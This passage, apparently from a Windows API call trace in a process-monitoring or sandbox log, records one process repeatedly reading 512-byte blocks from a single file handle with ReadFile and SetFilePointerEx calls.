nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, 